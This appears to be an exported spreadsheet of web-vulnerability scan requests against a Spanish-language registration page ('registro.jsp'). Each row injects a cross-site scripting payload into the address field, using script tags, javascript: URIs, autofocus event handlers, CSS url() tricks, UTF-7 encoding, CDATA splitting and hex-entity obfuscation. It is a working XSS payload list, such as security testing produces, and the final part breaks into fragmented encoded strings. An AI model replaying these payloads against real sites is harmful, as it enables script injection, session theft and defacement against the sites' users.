    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;style&gt;.60efdff4a130c5a3c56782d03b93a27b{background-image:url("60efdff4a130c5a3c56782d03b93a27b");}&lt;style&gt;&lt;aclass=60efdff4a130c5a3c56782d03b93a27b&gt;&lt;/a&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;styletype="textcss"&gt;body{background:url("267110856c6d3948dc25b3d7ed90f453")}&lt;/style&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;!--[ifgteie4]&gt;a1338ea2f9ce67fe339e77c9afb7e246&lt;![endif]--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;basehref="3e361b95ff54d863b63f4c509afad426/"&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;objectclassid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;paramname=urlvalue=40c04cd102a59433c54f80b1db922b1f&gt;&lt;object&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=a="get";b="url("";c="javascript:";d="74da699145cd79169d3956455de211a8")";eval(a+b+c+d);</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;?echo('&lt;scr)';echo('ipt&gt;1ca985c4e6c431829d0f5489bafd3f52&lt;script&gt;');?&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;metahttp-equiv="set-cookie"content="userid=&amp;lt;script&amp;gt;643fa5379f39fc4a7d32c0651d0c856c&amp;lt;script&amp;gt;"&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;scriptsrc=http:/127.0.0.1&gt;eee399232b46f3752e06a04d413e93c4&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;imgsrc="&amp;14;javascript:a7e9ec06a3611f03bf1c4db110be987d"&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;imgsrc="jav&amp;#x0d;ascript:91769fac28164c116df9101e9f7db980"&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=---&lt;imgsrc="&amp;#14;d47b73915b3f56da3255e8cd025329ba"&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=---&lt;imgsrc="34d056aa2a25f7cd28b2f87e9b7b9535"</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;script&gt;a=fae5e91c3e32ec275cf4462e32973be6/alert(a.source)&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=---";91e9d0fbefdd851f4fc9aa0098622899;/</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;metahttp-equivo"refresh"content="0;url=http:/;url=86048af8f406b3fafb7039289c97ec54"&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;script&lt;b&gt;=d47b58b44717d488993c4c3c5409d2fb"&gt;&lt;script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;iframesrc="javascript:d96289d9bf8ea37eca8e1d7f3ee92098&lt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;script&gt;a=605b81b77476bb80784dcfe0ad363ba9/n605b81b77476bb80784dcfe0ad363ba9&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;layersrc="javascript:20cc0df7bc61fa63aecf7bf452f8cf57&gt;&lt;layer&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;style&gt;li{list-style-image:url("f4cc4e1937e9cddfafe65a278fb99e25&lt;style&gt;&lt;ul&gt;&lt;li&gt;f4cc4e1937e9cddfafe65a278fb99e25</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;divstyle="background-image:url(&amp;#1;javascript:bb925a0e8cdc1e8ed810fd32cea62194"&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;head&gt;&lt;metahttp-equiv="content-type"content="texthtml;charset=utf-7"&gt;&lt;/head&gt;+adw-script+ad4-290a643f08376884a89e7403838cda06+adw-/script+ad4-</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;ahref="javascript#294fe3e48381cafceeaddbb977516f31"&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;inputtype="image"dynsrc="ee0c0b6f90e68262cb1ffc12e3d83355"&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&amp;93ef54e2a2a6ee92f90290b2764f73a1"&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&amp;{31515f15f9531f935e08e3621b57fd0b};</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;imgsrc=&amp;{7c7c28f19d4daae09a476ef74061604a};&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;ahref="about:bdf6a9ae8428a345d534a3b0a380fc60"&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;divstyle="binding:url(javascript:d12c36f6f7c4f4bff421b5921651f632);"&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;objectclassid=clsid:..."codebase="javascript:263eb658fde72ed9ea529e25e536bfc6"&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;style&gt;&lt;!--&lt;style&gt;&lt;script&gt;7080acad59a2fd41ebd0cfc9d4b8e454//--&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=![cdata[&lt;!--]]&lt;script&gt;15038a9329ffd8883de8f61a37ffc646/--&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;!------&gt;16f47c394dd93257d8f66a817e0bb02a&lt;!------&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;xmlid="x"&gt;&lt;a&gt;&lt;b&gt;9ae5b341e19848cc636adfea324e9ed2;&lt;b&gt;&lt;a&gt;&lt;/xml&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;divdatafld="b"dataformatas="html"datasrc="#9526b0b49ab5b5ef62122e999fe14a31"&gt;&lt;div&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;xmlid=i&gt;&lt;x&gt;&lt;c&gt;&lt;![cdata[&lt;imgsrc="javas]]&lt;![cdata[cript:219a48c0444a7e14b0d2286dc320b0fc"&gt;]]&lt;c&gt;&lt;x&gt;&lt;/xml&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;formid="test"&gt;&lt;buttonform="test"formaction="javascript:f48c135bf0cb51f2732cc81a2965b6cb"&gt;x</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;inputonfocus=javascript:08cba42f3ce6f7cb8f8d419b62edd6cbautofocus&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;selectonfocus=javascript:865e51fa7af25e3633db4902c347c120autofocus&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;textareaonfocus=javascript:26e2e8c26e7c39037287fe64fc2d6991autofocus&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;keygenonfocus=javascript:686c70c7b620ab2b9cb6dbaa49b39a9bautofocus&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;inputonblur=javascript:b25d1c5a0e55ad9c25cf6bdd9e63d712autofocus&gt;&lt;inputautofocus&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;videoposter=javascript:eb4b2039c6743a1d86911117c8356818/</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;bodyonscroll=6466a3b30e4a750b8635d2dee6bb8cb1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&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=x&lt;formid=testonforminput=javascript:c8dd081ace825c28e36b03af0b4831e9&gt;&lt;input&gt;&lt;form&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=x&lt;formid=test&gt;&lt;input&gt;&lt;form&gt;&lt;buttonform=testonformchange==javascript:e06a44675104ffe8468205d80bac6504&gt;x</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;video&gt;&lt;sourceonerror="javascript:4923d8494963ea605d85a97891ca33d2"&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;ciudad=madrid&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=&lt;videoonerror="javascript:1781053814355396321a3884d0843c7d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2;&amp;#x3e;&amp;#x34;&amp;#x63;&amp;#x38;&amp;#x35;&amp;#x62;&amp;#x37;&amp;#x66;&amp;#x39;&amp;#x66;&amp;#x62;&amp;#x61;&amp;#x63;&amp;#x37;&amp;#x37;&amp;#x39;&amp;#x65;&amp;#x63;&amp;#x31;&amp;#x33;&amp;#x61;&amp;#x32;&amp;#x30;&amp;#x33;&amp;#x35;&amp;#x61;&amp;#x61;&amp;#x32;&amp;#x63;&amp;#x64;&amp;#x38;&amp;#x36;&amp;#x65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2;&amp;#x3e;&amp;#x3c;&amp;#x53;&amp;#x43;&amp;#x52;&amp;#x49;&amp;#x50;&amp;#x54;&amp;#x3e;&amp;#x61;&amp;#x6c;&amp;#x65;&amp;#x72;&amp;#x74;&amp;#x28;&amp;#x27;&amp;#x33;&amp;#x33;&amp;#x31;&amp;#x62;&amp;#x65;&amp;#x65;&amp;#x39;&amp;#x66;&amp;#x36;&amp;#x35;&amp;#x36;&amp;#x65;&amp;#x63;&amp;#x34;&amp;#x64;&amp;#x64;&amp;#x33;&amp;#x36;&amp;#x65;&amp;#x66;&amp;#x30;&amp;#x35;&amp;#x30;&amp;#x38;&amp;#x63;&amp;#x62;&amp;#x38;&amp;#x38;&amp;#x39;&amp;#x32;&amp;#x65;&amp;#x62;&amp;#x27;&amp;#x29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7;&amp;#x27;&amp;#x3b;&amp;#x21;&amp;#x2d;&amp;#x2d;&amp;#x22;&amp;#x3c;&amp;#x39;&amp;#x63;&amp;#x37;&amp;#x39;&amp;#x30;&amp;#x34;&amp;#x36;&amp;#x34;&amp;#x61;&amp;#x35;&amp;#x38;&amp;#x33;&amp;#x31;&amp;#x37;&amp;#x66;&amp;#x31;&amp;#x33;&amp;#x66;&amp;#x62;&amp;#x31;&amp;#x62;&amp;#x61;&amp;#x65;&amp;#x62;&amp;#x34;&amp;#x39;&amp;#x64;&amp;#x61;&amp;#x36;&amp;#x30;&amp;#x36;&amp;#x32;&amp;#x3e;&amp;#x3d;&amp;#x26;&amp;#x7b;&amp;#x28;&amp;#x29;&amp;#x7d;&amp;#x22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2f;&amp;#x54;&amp;#x49;&amp;#x54;&amp;#x4c;&amp;#x45;&amp;#x3e;&amp;#x38;&amp;#x61;&amp;#x65;&amp;#x36;&amp;#x32;&amp;#x33;&amp;#x64;&amp;#x33;&amp;#x61;&amp;#x36;&amp;#x39;&amp;#x61;&amp;#x65;&amp;#x34;&amp;#x36;&amp;#x32;&amp;#x38;&amp;#x31;&amp;#x64;&amp;#x35;&amp;#x65;&amp;#x33;&amp;#x63;&amp;#x38;&amp;#x61;&amp;#x65;&amp;#x37;&amp;#x37;&amp;#x66;&amp;#x64;&amp;#x64;&amp;#x30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2;&amp;#x3e;&amp;#x3c;&amp;#x69;&amp;#x6d;&amp;#x67;&amp;#x20;&amp;#x73;&amp;#x72;&amp;#x63;&amp;#x3d;&amp;#x22;&amp;#x78;&amp;#x3a;&amp;#x78;&amp;#x22;&amp;#x20;&amp;#x6f;&amp;#x6e;&amp;#x65;&amp;#x72;&amp;#x72;&amp;#x6f;&amp;#x72;&amp;#x3d;&amp;#x22;&amp;#x35;&amp;#x39;&amp;#x35;&amp;#x62;&amp;#x30;&amp;#x32;&amp;#x63;&amp;#x35;&amp;#x37;&amp;#x36;&amp;#x38;&amp;#x61;&amp;#x66;&amp;#x39;&amp;#x64;&amp;#x37;&amp;#x31;&amp;#x30;&amp;#x64;&amp;#x39;&amp;#x64;&amp;#x36;&amp;#x64;&amp;#x33;&amp;#x31;&amp;#x38;&amp;#x65;&amp;#x61;&amp;#x65;&amp;#x38;&amp;#x66;&amp;#x34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f;&amp;#x44;&amp;#x59;&amp;#x20;&amp;#x6f;&amp;#x6e;&amp;#x6c;&amp;#x6f;&amp;#x61;&amp;#x64;&amp;#x21;&amp;#x23;&amp;#x24;&amp;#x25;&amp;#x26;&amp;#x28;&amp;#x29;&amp;#x2a;&amp;#x7e;&amp;#x2b;&amp;#x2d;&amp;#x5f;&amp;#x2e;&amp;#x2c;&amp;#x3a;&amp;#x3b;&amp;#x3f;&amp;#x40;&amp;#x5b;&amp;#x2f;&amp;#x7c;&amp;#x5c;&amp;#x5d;&amp;#x5e;&amp;#x60;&amp;#x3d;&amp;#x35;&amp;#x31;&amp;#x65;&amp;#x37;&amp;#x64;&amp;#x36;&amp;#x31;&amp;#x65;&amp;#x62;&amp;#x35;&amp;#x64;&amp;#x37;&amp;#x36;&amp;#x37;&amp;#x37;&amp;#x30;&amp;#x64;&amp;#x39;&amp;#x34;&amp;#x30;&amp;#x34;&amp;#x38;&amp;#x36;&amp;#x30;&amp;#x33;&amp;#x38;&amp;#x62;&amp;#x61;&amp;#x38;&amp;#x30;&amp;#x66;&amp;#x36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7;&amp;#x27;&amp;#x3b;&amp;#x21;&amp;#x2d;&amp;#x2d;&amp;#x22;&amp;#x3c;&amp;#x39;&amp;#x39;&amp;#x37;&amp;#x62;&amp;#x32;&amp;#x31;&amp;#x61;&amp;#x37;&amp;#x35;&amp;#x64;&amp;#x31;&amp;#x39;&amp;#x61;&amp;#x63;&amp;#x38;&amp;#x64;&amp;#x66;&amp;#x37;&amp;#x65;&amp;#x36;&amp;#x36;&amp;#x63;&amp;#x34;&amp;#x35;&amp;#x39;&amp;#x34;&amp;#x65;&amp;#x66;&amp;#x65;&amp;#x31;&amp;#x37;&amp;#x66;&amp;#x3e;&amp;#x3d;&amp;#x26;&amp;#x7b;&amp;#x28;&amp;#x29;&amp;#x7d;&amp;#x22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65;&amp;#x61;&amp;#x32;&amp;#x38;&amp;#x38;&amp;#x30;&amp;#x65;&amp;#x33;&amp;#x34;&amp;#x37;&amp;#x64;&amp;#x65;&amp;#x33;&amp;#x64;&amp;#x65;&amp;#x61;&amp;#x66;&amp;#x61;&amp;#x64;&amp;#x33;&amp;#x37;&amp;#x35;&amp;#x34;&amp;#x39;&amp;#x62;&amp;#x33;&amp;#x64;&amp;#x37;&amp;#x66;&amp;#x62;&amp;#x33;&amp;#x6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36;&amp;#x64;&amp;#x64;&amp;#x37;&amp;#x30;&amp;#x61;&amp;#x66;&amp;#x34;&amp;#x33;&amp;#x32;&amp;#x34;&amp;#x37;&amp;#x62;&amp;#x32;&amp;#x65;&amp;#x35;&amp;#x39;&amp;#x33;&amp;#x31;&amp;#x36;&amp;#x65;&amp;#x37;&amp;#x31;&amp;#x66;&amp;#x30;&amp;#x32;&amp;#x34;&amp;#x65;&amp;#x32;&amp;#x38;&amp;#x36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60;&amp;#x64;&amp;#x66;&amp;#x32;&amp;#x32;&amp;#x64;&amp;#x34;&amp;#x61;&amp;#x66;&amp;#x64;&amp;#x30;&amp;#x32;&amp;#x35;&amp;#x38;&amp;#x33;&amp;#x63;&amp;#x63;&amp;#x33;&amp;#x30;&amp;#x39;&amp;#x31;&amp;#x32;&amp;#x65;&amp;#x66;&amp;#x66;&amp;#x30;&amp;#x38;&amp;#x39;&amp;#x65;&amp;#x32;&amp;#x32;&amp;#x34;&amp;#x39;&amp;#x60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22;&amp;#x22;&amp;#x22;&amp;#x3e;&amp;#x33;&amp;#x37;&amp;#x39;&amp;#x34;&amp;#x37;&amp;#x61;&amp;#x31;&amp;#x35;&amp;#x62;&amp;#x30;&amp;#x38;&amp;#x61;&amp;#x33;&amp;#x33;&amp;#x61;&amp;#x30;&amp;#x36;&amp;#x62;&amp;#x61;&amp;#x64;&amp;#x62;&amp;#x37;&amp;#x36;&amp;#x30;&amp;#x32;&amp;#x31;&amp;#x62;&amp;#x31;&amp;#x63;&amp;#x66;&amp;#x37;&amp;#x65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20;&amp;#x26;&amp;#x23;&amp;#x31;&amp;#x34;&amp;#x3b;&amp;#x20;&amp;#x20;&amp;#x34;&amp;#x34;&amp;#x65;&amp;#x31;&amp;#x64;&amp;#x35;&amp;#x61;&amp;#x38;&amp;#x35;&amp;#x66;&amp;#x34;&amp;#x33;&amp;#x38;&amp;#x36;&amp;#x30;&amp;#x38;&amp;#x39;&amp;#x36;&amp;#x31;&amp;#x38;&amp;#x65;&amp;#x66;&amp;#x64;&amp;#x37;&amp;#x35;&amp;#x31;&amp;#x33;&amp;#x39;&amp;#x34;&amp;#x37;&amp;#x62;&amp;#x65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5;&amp;#x68;&amp;#x61;&amp;#x76;&amp;#x69;&amp;#x6f;&amp;#x75;&amp;#x72;&amp;#x3a;&amp;#x20;&amp;#x75;&amp;#x72;&amp;#x6c;&amp;#x28;&amp;#x63;&amp;#x62;&amp;#x35;&amp;#x31;&amp;#x32;&amp;#x66;&amp;#x62;&amp;#x31;&amp;#x38;&amp;#x37;&amp;#x31;&amp;#x61;&amp;#x66;&amp;#x30;&amp;#x64;&amp;#x66;&amp;#x33;&amp;#x32;&amp;#x32;&amp;#x65;&amp;#x66;&amp;#x37;&amp;#x33;&amp;#x64;&amp;#x31;&amp;#x38;&amp;#x65;&amp;#x35;&amp;#x61;&amp;#x32;&amp;#x30;&amp;#x63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3c;&amp;#x53;&amp;#x43;&amp;#x52;&amp;#x49;&amp;#x50;&amp;#x54;&amp;#x3e;&amp;#x63;&amp;#x64;&amp;#x62;&amp;#x31;&amp;#x64;&amp;#x32;&amp;#x61;&amp;#x39;&amp;#x39;&amp;#x63;&amp;#x62;&amp;#x38;&amp;#x30;&amp;#x32;&amp;#x61;&amp;#x32;&amp;#x33;&amp;#x36;&amp;#x65;&amp;#x32;&amp;#x34;&amp;#x31;&amp;#x32;&amp;#x36;&amp;#x62;&amp;#x30;&amp;#x66;&amp;#x33;&amp;#x36;&amp;#x36;&amp;#x34;&amp;#x31;&amp;#x2f;&amp;#x2f;&amp;#x3c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2;&amp;#x3b;&amp;#x62;&amp;#x36;&amp;#x37;&amp;#x34;&amp;#x31;&amp;#x32;&amp;#x38;&amp;#x33;&amp;#x32;&amp;#x65;&amp;#x65;&amp;#x30;&amp;#x39;&amp;#x38;&amp;#x38;&amp;#x31;&amp;#x30;&amp;#x33;&amp;#x38;&amp;#x64;&amp;#x39;&amp;#x66;&amp;#x65;&amp;#x31;&amp;#x63;&amp;#x31;&amp;#x65;&amp;#x39;&amp;#x63;&amp;#x3